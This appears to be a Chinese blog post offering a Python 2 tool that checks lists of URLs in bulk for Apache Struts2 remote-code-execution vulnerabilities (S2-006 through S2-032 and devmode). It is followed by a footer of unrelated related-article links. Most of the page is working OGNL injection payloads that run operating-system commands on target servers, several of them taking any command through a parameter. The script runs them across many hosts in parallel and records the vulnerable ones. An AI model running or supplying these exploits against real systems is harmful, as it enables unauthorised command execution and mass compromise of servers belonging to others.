only poc , 再据结果利用EXP进一步测试;

支持 -u 单个url; -f 文本批量URL导入

url列表格式是https://www.baidu.com

#! /usr/bin/env python

# -*-coding:utf-8-*-

import os

import sys

import Queue

import getopt

import logging

import requests

import threading

logging.basicConfig(

    level=logging.WARNING,

    format="[%(asctime)s] %(message)s"

)

def struts2_006(url):

    headers = {"Content-Type": "application/x-www-form-urlencoded"}

    exp = '''('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'netstat -an\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))'''

    try:

        resp = requests.post(url, data=exp, headers=headers, timeout=10)

        if "0.0.0.0" in resp.content:

            return "s2-006"

    except:

        return None

    return None

def struts2_009(url):

    exp = '''?class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]'''

    url += exp

    try:

        resp = requests.get(url, timeout=10)

        if "0.0.0.0" in resp.content:

            return "s2-009"

    except:

        return None

    return None

def struts2_013(url):

    headers = {"Content-Type": "application/x-www-form-urlencoded"}

    exp = '''a=1${(%23_memberAccess["allowStaticMethodAccess"]=true,%23a=@java.lang.Runtime@getRuntime().exec('netstat -an').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%23sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}'''

    try:

        resp = requests.post(url, data=exp, headers=headers, timeout=10)

        if "0.0.0.0" in resp.content:

            return "s2-013"

    except:

        return None

    return None

def struts2_016(url):

    exp = '''?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%20%7B'netstat','-an'%7D)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader%20(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%20%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println%20(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D'''

    url += exp

    try:

        resp = requests.get(url, timeout=10)

        if "0.0.0.0" in resp.content:

            return "s2-016"

    except:

        return None

    return None

def struts2_016_multipart_formdata__special(url):

    headers = {

        "Accept-Encoding": "gzip, deflate",

        "Connection": " Keep-Alive",

        "Cookie": "",

        "Content-Type": "multipart/form-data; boundary=------------------------4a606c052a893987",

    }

    exp = '''--------------------------4a606c052a893987\r\nContent-Disposition: form-data; name="method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&cmd=netstat -ano&pp=\\A&ppp= &encoding=UTF-8"\r\n\r\n-1\r\n--------------------------4a606c052a893987--'''

    try:

        resp = requests.post(url, data=exp, headers=headers, timeout=10)

        if "0.0.0.0" in resp.content:

            return "s2-016"

    except:

        return None

    return None

def struts2_019(url):

    headers = {"Content-Type": "application/x-www-form-urlencoded"}

    exp = '''debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.ServletActionContext@getRequest(),#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'netstat','-an'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[10000],#d.read(#e),#resp.println(#e),#resp.close()'''

    url += exp

    try:

        resp = requests.post(url, data=exp, headers=headers, timeout=10)

        if "0.0.0.0" in resp.content:

            return "s2-019"

    except:

        return None

    return None

def struts2_032(url):

    headers = {"Content-Type": "application/x-www-form-urlencoded"}

    exp = '''?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=netstat%20-an&pp=\\A&ppp=%20&encoding=UTF-8'''

    url += exp

    try:

        resp = requests.get(url, headers=headers, timeout=10)

        if "0.0.0.0" in resp.content:

            return "s2-032"

    except:

        return None

    return None

def struts2_devmode(url):

    headers = {"Content-Type": "application/x-www-form-urlencoded"}

    exp = '''?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=netstat -an'''

    url += exp

    try:

        resp = requests.get(url, headers=headers, timeout=10)

        if "0.0.0.0" in resp.content:

            return "s2-devmode"

    except:

        return None

    return None

def struts2_all(url):

    logging.warning("trying %s" % url)

    res = struts2_devmode(url) or struts2_032(url) or struts2_019(url) or struts2_016_multipart_formdata__special(

        url) or struts2_016(url) or struts2_013(url) or struts2_009(url) or struts2_006(url)

    if res:

        with open("vuls.txt", "a") as f:

            f.write("%s is struts2 %s vulnerable!\n" % (url, res))

class BatchThreads(threading.Thread):

    def __init__(self, queue):

        super(BatchThreads, self).__init__()

        self.queue = queue

    def run(self):

        while True:

            if self.queue.empty():

                break

            else:

                try:

                    url = self.queue.get()

                    struts2_all(url)

                except:

                    break

def batch_queue(_file, _queue, _thread_number):

    with open(_file) as f:

        urls = [line.strip() for line in f.readlines()]

    urls = set(filter(lambda url: url and not url.startswith("#"), urls))

    if urls:

        for url in urls:

            queue.put(url)

        if _thread_number > (queue.qsize() / 2):

            _thread_number = (queue.qsize())

        for _ in xrange(_thread_number):

            threads.append(BatchThreads(_queue))

        for t in threads:

            t.start()

        for t in threads:

            t.join()

def usage():

    print '''Usage: python %s [option]

All Struts2 Vulnerable Test

-h         scan a single host

-f         scan from a file

    ''' % os.path.basename(sys.argv[0])

if __name__ == '__main__':

    global threads

    threads = []

    queue = Queue.Queue()

    thread_number = 20

    if not len(sys.argv[1:]):

        exit(usage())

    try:

        opts, args = getopt.getopt(sys.argv[1:], 'u:f:')

    except getopt.GetoptError as err:

        exit(usage())

    else:

        for name, value in opts:

            if name == '-u':

                struts2_all(value)

            if name == '-f':

                batch_queue(value, queue, thread_number)

update

Struts2批量验证(POC)的更多相关文章

  1. python3 多线程批量验证POC模板

    #coding:utf-8 import threading,Queue,sys,os class RedisUN(threading.Thread): def __init__(self,queue ...

  2. 【Python】CVE-2017-10271批量自查POC(Weblogic RCE)

    1.说明 看到大家对weblogic漏洞这么热衷,于是也看看这个漏洞的测试方式. 找了几个安全研究员的博客分析,经过几天的摸索大体清楚漏洞由XMLDecoder的反序列化产生. 漏洞最早4月份被发现, ...

  3. redis未授权访问批量验证脚本编写[python]

    漏洞简介 简单来说,redis是一个数据库.在默认的配置下,redis绑定在0.0.0.0:6379,也就是说,如果服务器有公网ip,可以通过访问其公网ip的6379端口来操作redis.最为致命的是 ...

  4. 【Java EE 学习 35 下】【struts2】【struts2文件上传】【struts2自定义拦截器】【struts2手动验证】

    一.struts2文件上传 1.上传文件的时候要求必须使得表单的enctype属性设置为multipart/form-data,把它的method属性设置为post 2.上传单个文件的时候需要在Act ...

  5. 表单验证:$tablePrefix(定义表前缀);$trueTableName = 'yonghu',找到真实表名(yonghu)表;create($attr,0)两个参数;批量验证(返回数组);ajax+动态验证表单

    *$tablePrefix是定义在Model中的,优先级大于配置文件中,如果项目中表前缀全部比如为"a_",并且在配置文件中定义了 'DB_PREFIX'=>'a_' 后期如 ...

  6. thinkphp自动验证中的静态验证和动态验证和批量验证

    1.静态定义 在模型类里面预先定义好该模型的自动验证规则,我们称为静态定义. 举例说明,我们在模型类里面定义了$_validate属性如下: class UserModel extends Model ...

  7. struts2 的验证框架validation如何返回json数据 以方便ajax交互

    struts2 的验证框架validation简单,好用,但是input只能输出到jsp页面通过struts2的标签<s:fielderror  />才能取出,(EL应该也可以). 如果使 ...

  8. Struts2 框架验证

    struts2框架验证(xml方式):    * 首先要从页面中获取对应的标签name属性的值,在动作类action中声明同名的属性,提供get和set方法        * 创建一个xml格式验证文 ...

  9. iis6-0 cve-2017-7269 批量验证脚本

    代码地址 import subprocess f = open('ips.txt', 'r') flines = f.readlines() vulnsrvs = 0 i = 1 for line i ...

随机推荐

  1. [转] 前端中的MVC

    MVC是一种设计模式,它将应用划分为3个部分:数据(模型).展现层(视图)和用户交互(控制器).其中: M - MODEL(模型) V - VIEW(视图) C - CONTROLLER(控制器) 一 ...

  2. 2016 CCPC 东北地区重现赛

    1. 2016 CCPC 东北地区重现赛 2.总结:弱渣,只做出01.03.05水题 08   HDU5929 Basic Data Structure    模拟,双端队列 1.题意:模拟一个栈的操 ...

  3. Glyphicon 字体图标

    Bootstrap中的Glyphicon 字体图标 在Bootstrap框架中也为大家提供了近200个不同的icon图片,而这些图标都是使用CSS3的@font-face属性配合字体来实现的icon效 ...

  4. scrapy爬虫笔记(二)------交互式爬取

    开始网页爬取:(1)交互式爬取 首先,我们使用scrapy建立起爬虫的框架.在命令行中输入 scrapy shell “url” 如:scrapy shell “http://www.baidu.co ...

  5. C#导入导出数据你该知道的方法。

    导入数据 using NPOI.HSSF.UserModel; using NPOI.SS.UserModel; using NPOI.XSSF.UserModel; using System; us ...

  6. nginx域名隐性(地址栏域名不变)跳转

    1.完全url的域名隐性跳转 server_name a.b.com location / { proxy_pass http://x.y.com; } 效果:浏览器地址栏中输入a.b.com域名不变 ...

  7. 【转】logback 常用配置详解(序)logback 简介

    原创文章,转载请指明出处:http://aub.iteye.com/blog/1101222, 尊重他人即尊重自己 详细整理了logback常用配置, 不是官网手册的翻译版,而是使用总结,旨在更快更透 ...

  8. TotalCommander 之 配置

    一.设置配置界面: 1.进入设置界面       点击菜单栏的配置,然后再点击配置里面的选项,便会出现Total Commander设置的界面. 2.设置字体 刚开始,大家会发现这不是我们熟悉的字体啊 ...

  9. Nginx多个域名,https redirect to http

    背景描述:Nginx绑定多个域名,其中一个域名配置了https,如域名A:https://www.aaa.com:另外的域名B(http://www.bbb.com)没有配置SSL证书, 问题:以ht ...

  10. jdbc向各种数据库发送sql语句

    1.有了JDBC,向各种关系数据发送SQL语句就是一件很容易的事.换言之,有了JDBC API,就不必为访问Sybase数据库专门写一个程序,为访问Oracle数据库又专门写一个程序,或为访问Info ...